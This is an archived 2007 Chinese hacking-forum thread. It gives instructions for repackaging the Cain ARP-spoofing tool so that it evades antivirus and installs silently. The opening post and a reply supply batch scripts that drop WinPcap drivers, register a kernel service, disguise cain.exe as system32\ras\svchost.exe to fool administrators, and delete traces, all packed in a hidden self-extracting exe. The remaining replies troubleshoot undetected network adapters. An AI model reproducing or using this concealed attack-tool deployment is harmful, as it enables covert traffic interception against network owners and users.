邪恶八进制信息安全团队技术讨论组 » 技术讨论{ Technique Discussions } » [讨论]绿色cain制作过程 比较完美的方法了 [查看完整版本]

l4dron 2007-10-22 17:55

[讨论]绿色cain制作过程 比较完美的方法了

议题作者：l4dron（[url]http://www.myspace.cn/hack[/url]）
信息来源：邪恶八进制信息安全团队（[url]www.eviloctal.com[/url]）

经过测试后，大家可以发现，ca_setup.exe这个文件安装后，如果只是执行arp欺骗工作的话，只要cain.exe这个文件就可以了，其他的安装文件可以全部不要（所需的驱动文件除外）。

首先自己安装下cain，默认安装就可以。然后把cain.exe复制出来，加花处理下，主要是针对4.97这个版本被挪吨这个杀毒软件杀掉的问题。

然后提取出下列文件：

system32\drivers\npf.sys
system32\packet.dll
system32\wpcap.dll
system32\wanpacket.dll

放在刚才复制出来那个cain.exe的同一目录里，再写一个bat文件，当然，vbs文件也可以，我写的是bat文件。bat文件内容如下：

@echo off
copy packet.dll %SYSTEMROOT%\system32\packet.dll
copy wpcap.dll %SYSTEMROOT%\system32\wpcap.dll
copy wanpacket.dll %SYSTEMROOT%\system32\wanpacket.dll
copy npf.sys %SYSTEMROOT%\system32\drivers\npf.sys
copy cain.exe %SYSTEMROOT%\system32\ras\svchost.exe
sc create npf binpath= system32\drivers\npf.sys type= kernel start= demand
del packet.dll
del wpcap.dll
del wanpacket.dll
del npf.sys
del cain.exe
del l4.exe
del l4.bat


保存好后制作一个自解压文件，制作过程很简单，要求是解压后就运行刚才建立的l4.bat，自解压文件命名为l4.exe，在解压路径为当前目录创建，模式为全部隐藏和覆盖所有文件，文本和图标那里可以自己选一个ico文件，好了，这就算制作完毕。

我测试过，cain这个arpsniffe工具，只有cain.exe这个主文件就可以照常运行arp攻击。

现在，这个cain.exe为免杀，绿色，自动安装所需的驱动，体积仅为1.15mb。点击l4.exe后自动释放cain.exe到system32\ras\目录下并该名为svchost.exe（这样在任务管理器里管理员看到的还是svchost.exe，可以小欺骗下管理员）。运行cain.exe的时候，会弹出来个框，问你确实要运行这个工具么，点是就可以了。0k，现在可以尽情的arp欺骗了。

实在不想自己diy的，加我QQ，我pub给你。

7个b 2007-11-13 01:24

原谅我实在太无聊了,便手简化一下你的P处理...
@echo off
set SysDir=%SYSTEMROOT%\System32\
copy packet.dll %SysDir%\packet.dll /y
copy wpcap.dll %SysDir%\wpcap.dll /y
copy wanpacket.dll %SysDir%\wanpacket.dll /y
copy npf.sys %SysDir%\drivers\npf.sys /y
copy cain.exe %SysDir%\ras\svchost.exe /y
sc create npf binpath = %SysDir%\drivers\npf.sys type= kernel start= demand
del packet.dll /a
del wpcap.dll /a
del wanpacket.dll /a
del npf.sys /a
del cain.exe /a
del l4.exe
del %0
楼主的思路固然是好的,Cain自带的WinPcap安装后会残留一些垃圾信息,比如服务名之类的.实在不爽,很支持楼主的做法... [s:264]

9989 2007-11-13 08:26

有时候会遇到CAIN找不到网卡，不知道什么原因，但是又能A

有时候不能A 能C 郁闷死了！

rabbitsafe 2007-11-14 10:28

我试了,好像不行啊,找不到网卡

l4dron 2007-12-16 20:51

找不到网卡大致情况有两个，一个是win2000系统，安装winpcap后需要重新启动服务器才可以。
另一个是winpcap驱动不对，单独安装下winpcap，然后再把相关痕迹去掉，就可以。

xg530 2007-12-17 05:52

Description . . . . . . . . . . . : SWsoft Virtual Network Adapter
这样的也找不到网卡的`也不能用cain``请指点下

xg530 2007-12-17 05:58

好象是vps里面的机器 ```晕咯``怎么搞``

查看完整版本: [讨论]绿色cain制作过程 比较完美的方法了

© 1999-2008 EvilOctal Security Team